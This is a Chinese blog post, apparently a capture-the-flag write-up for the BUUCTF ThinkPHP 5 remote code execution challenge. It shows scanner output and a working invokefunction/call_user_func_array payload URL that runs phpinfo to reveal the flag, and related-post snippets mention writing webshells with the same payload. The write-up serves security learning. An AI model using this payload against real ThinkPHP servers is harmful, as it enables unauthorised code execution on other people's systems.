BUUCTF-Real-[ThinkPHP]5-Rce

最新推荐文章于 2024-05-28 18:22:36 发布

真的学不了一点。。。

最新推荐文章于 2024-05-28 18:22:36 发布

阅读量740

点赞数 5

分类专栏：漏洞复现与研究文章标签：网络安全

本文链接：https://blog.csdn.net/rx3225968517/article/details/135963003

版权

漏洞复现与研究专栏收录该内容

11 篇文章 0 订阅

订阅专栏

1、ThinkPHP检测工具

https://github.com/anx0ing/thinkphp_scan

漏洞检测

通过漏洞检测，我们发现存在rce漏洞！

2、漏洞利用

----
[!] Name: Thinkphp5 5.0.22/5.1.29 Remote Code Execution Vulnerability
    Script: thinkphp5022_5129.py
    Url: http://node5.buuoj.cn:27683/
      Vulnerable: True
      Attack: True
      Method: GET
      Payload: http://node5.buuoj.cn:27683/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=1
----

payload

http://node5.buuoj.cn:27683/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 and it'll execute the phpinfo：

修改payload，我们就可以拿到phpinfo页面，flag就在其中！

至于扫描器，githb有很多！自己下载！

3、get flag

flag{9f4a1a0b-ef58-49ac-8344-63aa3914af75}

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

真的学不了一点。。。

关注关注

5
点赞
踩
9

收藏

觉得还不错? 一键收藏
0
评论
BUUCTF-Real-[ThinkPHP]5-Rce

多积累漏洞利用经验！
复制链接

扫一扫

专栏目录

BUUCTF-thinkPHP5 RCE

朋克归零膏的博客

10-12

411

real题目我认为getflag是没意义的,幸运的是能从中学到一些技巧。在用大佬的poc对比官方的poc有一个细节。这题在尝试用命令执行写一句话的时候发现输入。,因此思路应该是将一句话分成两段然后拼一起。会被替换成空字符但是能单独写。

buuctf [ThinkPHP]5-Rce

qq_1873822的博客

03-14

1733

大佬们都是直接rce 这里漏洞技术细节（涉及代码段、原理等）我上个链接 https://blog.csdn.net/ArrowQin/article/details/105913146 https://bbs.ichunqiu.com/thread-48687-1-1.html?tdsourcetag=s_pcqq_aiomsg 解题版本是ThinkPHP V5.0.20 poc ?s=index/\think\app/invokefunction&function=call_user_fun.

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF之[ThinkPHP]5-Rce WP及getShell的新姿势

克格莫

10-10

2817

题目给了提示： https://github.com/vulhub/vulhub/blob/master/thinkphp/5-rce 照上面的POC做就能在phpinfo中找到flag，此处不再赘述。拿到flag之后我想通过这个payload拿一波webshell，故使用以下POC写一句话,先创建一个php文件： http://xxxxxxxxx/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_

ThinkPHP2--RCE漏洞复现

m0_74402888的博客

05-03

986

var['\1']="\2" 这里双引号引发函数执行，了解为什么${}会执行，在PHP当中，${}是可以构造一个变量的，{}写的是一般的字符，那么就会被当成变量，比如${a}等价于$a，那如果{}写的是一个已知函数名称呢？()值提取匹配的字符串，有几个括号就代表有几个匹配的字符串，看结果我们就知道，我们的目的是将键和值分别提取出来，所有有两个()，一个匹配键，一个匹配值。$a的执行语句执行了（注意如果要实现该代码需要修改php的版本为5.x的版本）s=a/a/a/${phpinfo()} 其中a随意。

buuctf-Real-[ThinkPHP]5-Rce

weixin_46079186的博客

05-09

512

题目地址是ThinkPHP v5这么有名的漏洞，直接网上找poc 找到poc 复制粘贴一下可以执行phpinfo ，尝试执行以下其他命令找了一会没找到，直接写了一个shell 进去找，linux shell脚本原因会过滤$_POST，所以要加\转义使用蚁剑连接找了半天，flag就在phpinfo里面。。。。。 ...

【ThinkPHP5 5.0.22/5.1.29 RCE】

xhwfa的博客

05-02

3137

一、漏洞描述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中，因为没有正确处理控制器名，致使在网站没有开启强制路由的状况下（即默认状况下）能够执行任意方法，从而致使远程命令执行漏洞。二、影响版本 ThinkPHP 5.0系列 < 5.0.23 ThinkPHP 5.1系列 < 5.1.31 三、漏洞环境搭建 cd /vulhub-master/thinkphp/5-rce docker-compose up -d 访问192.168.110.134:8080，出现如

thinkphp-bjyblog 开源博客系统 v1.1

10-11

闲暇之时使用thinkphp开发了一个个人博客用来整理技能知识；如今博客的功能基本已经齐备；特开源以供各类猿们使用; 亦可以作为初学thinkphp的同学们的参考源代码；此博客程序

tp6-vue-admin:基于thinkphp6+vue2.6+element2.13 前后端分离落地解决方案

05-02

#thinkphp6+vue2.6+element2.13 前后端分离落地解决方案本人开发环境版本信息： npm=6.13.4 vue =@vue/cli 4.1.2 node=v12.14.1 #注意1：vue-admin 中接口请求规则和动态路由，是对应tp6 中的接口规则和权限规则，...

计算机-php-基于ThinkPHP的微课教学竞赛系统设计与实现.pdf

07-14

计算机-php-基于ThinkPHP的微课教学竞赛系统设计与实现.pdf

tp5-api-master_termjtv_thinkphp5_tp_system-master_

10-03

基于thinkphp5开发的管理后台程序

计算机后端-ThinkPHP5商城系统+项目实战jquery04.3CSS.wmv

05-23

计算机后端-ThinkPHP5商城系统+项目实战jquery04.3CSS.wmv

BUUCTF-Real-ThinkPHP]5.0.23-Rce

02-02

670

[ThinkPHP]5.0.23版本，RCE远程代码执行漏洞！

记录一次vulhub ：Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现

sszsNo1的博客

06-29

190

vulhub ：Thinkphp5 5.0.22/5.1.29 远程代码执行漏洞复现

BuuCTF [Think php]5-Rce新手教程

最新发布

wwwyydshen的博客

05-28

194

这里避免新手踩坑我用红框框，框出了你所需要输入端口的地方，这里我们打开了页面，看到页面的第一反应就是查看一下它的源代码，这里我用的浏览器是主机上普通的浏览器，因为这道题不需要抓包所以咱们就简单点，不需要用kali也可以。flag居然藏在这里，藏的好深，得一直往下滑才能找到，哈哈别再傻傻的划着找了，找到键盘上的ctrl+f 上面会出现一个小框框直接搜flag就找到它了！在这里我们不要放过任何一个细节，我省略了找的过程，因为很麻烦但是我的建议还是多做尝试，尝试过后可以学到更多的东西。

thinkphp 5 - rce

2301_76467680的博客

06-28

125

1 执⾏phpinfo。2存在漏洞代码执⾏。

Thinkphp5 RCE漏洞

Sentiment的博客

05-21

6938

影响版本 5.0.0<=ThinkPHP5<=5.0.23 、5.1.0<=ThinkPHP<=5.1.30 不同版本payload不同，且5.13版本后还与debug模式有关这里跟着feng师傅复现的，所以用的也是5.0.22 ThinkPHP5.0.22完整版 - ThinkPHP框架 5.0.22debug模式RCE 这波属实下饭了，开启debug模式后payload一直没打通，后来发现改成其他版本的配置文件了.........

红队渗透下的入口权限快速获取

m0_49936858的博客

08-12

801

此款扫描器支持thinkphp全版本，s2全版本，weblogic全版本的漏洞检测，并整合多个hvv高危漏洞，poc有的是网上收集有的是笔者自己编写，是很多扫描器的集合体，并且poc经过改动后误报率很低，能大大减少红队人员的手工验证漏洞时间。在信息收集时EHole是一款优秀的红队工具，它可以从大量杂乱的资产中找到这些易受攻击的系统，红队人员再利用对应组件的poc验证目标系统是否存在漏洞，以达到快速获取入口权限的目的。在真实的企业网络中内网往往是脆弱的，通过一个入口权限进入内网后往往可以上线大量内网机器。..

buuctf [ThinkPHP]5.0.23-Rce

qq_1873822的博客

03-14

1156

poc POST /index.php?s=captcha HTTP/1.1 Host: yuorip Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form.

poc-yaml-thinkphp5023-method-rce poc1

07-29

poc-yaml-thinkphp5023-method-rce poc1 是一种潜在的安全漏洞利用程序，利用该程序可以对使用 ThinkPHP 5.0.23 版本的应用进行远程代码执行攻击。 ThinkPHP 是一款常用的 PHP 框架，版本 5.0.23 存在一个命令行解析漏洞，攻击者可以利用该漏洞在服务器上执行任意命令。poc-yaml-thinkphp5023-method-rce 是一个利用该漏洞的示例程序。通过 poc1 工具，攻击者可以利用 YAML 文件解析的漏洞，实现远程代码执行。攻击者通过构造恶意 YAML 文件，并将其作为参数发送给目标应用的接口，从而触发代码执行。该漏洞的危害性很高，攻击者可以在受影响的应用上执行任意命令，例如查看、修改或删除敏感文件，创建新用户账户，获取数据库信息等。这可能导致严重的安全风险和数据泄露。为了防止此漏洞的利用，建议使用 ThinkPHP 的最新版本，并及时更新框架。此外，应开启严格的访问控制，限制对敏感函数和文件的访问。同时，将任何用户输入数据进行严格过滤和验证，以防止注入攻击。最重要的是，及时关注和安装安全补丁，保持应用程序的安全性。

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交